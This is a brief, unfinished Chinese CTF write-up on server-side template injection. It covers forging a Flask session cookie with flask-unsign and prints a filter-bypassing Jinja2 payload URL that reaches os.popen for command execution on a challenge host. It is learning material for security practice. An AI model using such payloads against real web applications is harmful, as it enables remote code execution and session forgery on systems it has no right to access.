SSTI题目整理(未完)
作者:互联网
1.flask session伪造
一开始没看出来是flask
flask中特殊变量config.py,其中配置了secret_key来加密构成session,参考:https://www.jianshu.com/p/278d4f59839d
读取文件
flask伪造session的话要安装flask-unsign包
pip install flask-unsign
之后抓包先解码session为明文,用法参考:https://github.com/Paradoxis/Flask-Unsign
明文为
{'username':b'guest'}
伪造
2.flask模板注入
直接查看文件的话有过滤
fuzz一下
点号、config、下划线、args被过滤
bypass参考:
https://blog.csdn.net/q20010619/article/details/107553119
https://blog.csdn.net/miuzzx/article/details/110220425
请求方式不对,有空看下错在哪里
http://xmctf.top:8901/?name={{%22%22[request[%22values%22][%22class%22]][request[%22values%22][%22mro%22]][1]request[%22values%22][%22subclasses%22][286][request[%22values%22][%22init%22]][request[%22values%22][%22globals%22]][%22os%22]%22popen%22request[%22values%22][%22read%22]}}
标签:session,题目,22,flask,request,SSTI,https,整理,22values% 来源: https://www.cnblogs.com/echoDetected/p/14775783.html